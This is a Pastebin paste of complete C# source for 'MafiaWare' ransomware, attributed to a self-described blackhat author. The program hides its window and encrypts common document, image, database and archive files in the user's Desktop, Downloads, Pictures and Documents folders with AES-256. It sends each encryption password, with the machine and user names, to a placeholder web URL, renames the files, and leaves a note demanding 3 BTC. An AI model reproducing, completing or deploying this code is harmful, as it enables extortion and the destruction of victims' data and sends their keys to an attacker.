Advertisement
cyberking

MafiaWare Ransomware

Apr 5th, 2016
22,634
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 5.12 KB | None | 0 0
  1. /*
  2.  *
  3.  * MAFIAWARE
  4.  * Algorithm from HT, with C Sources
  5.  * Encrypt with AES256
  6.  * Coded By Cyberking
  7.  * email : cyberking@outlook.co.id
  8.  * Mafia Blackhat - Indonesian BlackHat - Indonesian Backtrack Team
  9.  * https://stillblackhat.id
  10.  *
  11.  */
  12.  
  13. using System;
  14. using System.Diagnostics;
  15. using System.Collections.Generic;
  16. using System.ComponentModel;
  17. using System.Data;
  18. using System.Drawing;
  19. using System.Linq;
  20. using System.Text;
  21. using System.Threading.Tasks;
  22. using System.Windows.Forms;
  23. using System.Security;
  24. using System.Security.Cryptography;
  25. using System.IO;
  26. using System.Net;
  27. using Microsoft.Win32;
  28. using System.Runtime.InteropServices;
  29. using System.Text.RegularExpressions;
  30. namespace mafiaware {
  31. public partial class Form1 : Form {
  32. //Web untuk Password Unlock nya
  33. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
  34. string namaUser = Environment.UserName;
  35. string namaKompi = System.Environment.MachineName.ToString();
  36. string dirUsr = "C:\\Users\\";
  37. public Form1() {
  38. InitializeComponent();
  39. }
  40. private void Form1_Load(object sender, EventArgs e) {
  41. Opacity = 0;
  42. this.ShowInTaskbar = false;
  43. ngeEnrypt(); //mulai ngencrypt nya pas loading
  44. ngeEnrypt2();
  45. ngeEnrypt3();
  46. ngeEnrypt4();
  47. }
  48. private void Form_Shown(object sender, EventArgs e) {
  49. Visible = false;
  50. Opacity = 100;
  51. }
  52. //Algo encrypt AES256
  53. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
  54. byte[] encryptedBytes = null;
  55. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
  56. using (MemoryStream ms = new MemoryStream()) {
  57. using (RijndaelManaged AES = new RijndaelManaged()) {
  58. AES.KeySize = 256;
  59. AES.BlockSize = 128;
  60. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
  61. AES.Key = key.GetBytes(AES.KeySize / 8);
  62. AES.IV = key.GetBytes(AES.BlockSize / 8);
  63. AES.Mode = CipherMode.CBC;
  64. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
  65. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
  66. cs.Close();
  67. }
  68. encryptedBytes = ms.ToArray();
  69. }
  70. }
  71. return encryptedBytes;
  72. }
  73. //buat randompass encrypt
  74. public string BuatPass(int length) {
  75. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
  76. StringBuilder res = new StringBuilder();
  77. Random rnd = new Random();
  78. while (0 < length--){
  79. res.Append(valid[rnd.Next(valid.Length)]);
  80. }
  81. return res.ToString();
  82. }
  83.  //ngirim pass hasil trap ke web
  84. public void ngirimPass(string password){
  85. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
  86. var fullUrl = webPass + g0ttrap;
  87. var conent = new System.Net.WebClient().DownloadString(fullUrl);
  88. }
  89. //ngencrypt file
  90. public void ngencryptFile(string file, string password) {
  91. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
  92. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
  93. //ngehash pass dg sha256
  94. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
  95. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
  96. File.WriteAllBytes(file, bytesEncrypted);
  97. System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt
  98. }
  99. //ngencrypt folder
  100. public void ngencryptFolder(string location, string password) {
  101. //ekstensi yang mau di encrypt
  102. var validExtensions = new[] {
  103. ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
  104. };
  105.  
  106. string[] files = Directory.GetFiles(location);
  107. string[] childDirectories = Directory.GetDirectories(location);
  108. for (int i = 0; i < files.Length; i++){
  109. string extension = Path.GetExtension(files[i]);
  110. if (validExtensions.Contains(extension))
  111. {
  112. ngencryptFile(files[i],password);
  113. }
  114. }
  115. for (int i = 0; i < childDirectories.Length; i++){
  116. ngencryptFolder(childDirectories[i],password);
  117. }
  118. }
  119. public void ngeEnrypt() {
  120. string password = BuatPass(15);
  121. string path = "\\Desktop";
  122. string startPath = dirUsr + namaUser + path;
  123. ngirimPass(password);
  124. ngencryptFolder(startPath,password);
  125. pesanReadMe();
  126. password = null;
  127. System.Windows.Forms.Application.Exit();
  128. }
  129. public void ngeEnrypt2() {
  130. string password = BuatPass(15);
  131. string path = "\\Downloads";
  132. string startPath = dirUsr + namaUser + path;
  133. ngirimPass(password);
  134. ngencryptFolder(startPath,password);
  135. password = null;
  136. System.Windows.Forms.Application.Exit();
  137. }
  138. public void ngeEnrypt3() {
  139. string password = BuatPass(15);
  140. string path = "\\Pictures";
  141. string startPath = dirUsr + namaUser + path;
  142. ngirimPass(password);
  143. ngencryptFolder(startPath,password);
  144. password = null;
  145. System.Windows.Forms.Application.Exit();
  146. }
  147. public void ngeEnrypt4() {
  148. string password = BuatPass(15);
  149. string path = "\\Documents";
  150. string startPath = dirUsr + namaUser + path;
  151. ngirimPass(password);
  152. ngencryptFolder(startPath,password);
  153. password = null;
  154. System.Windows.Forms.Application.Exit();
  155. }
  156. public void pesanReadMe() {
  157. string path = "\\Desktop\\READ_ME.txt";
  158. string fullpath = dirUsr + namaUser + path;
  159. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Send 3BTC, then Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
  160. System.IO.File.WriteAllLines(fullpath, lines);
  161. }
  162. }
  163. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement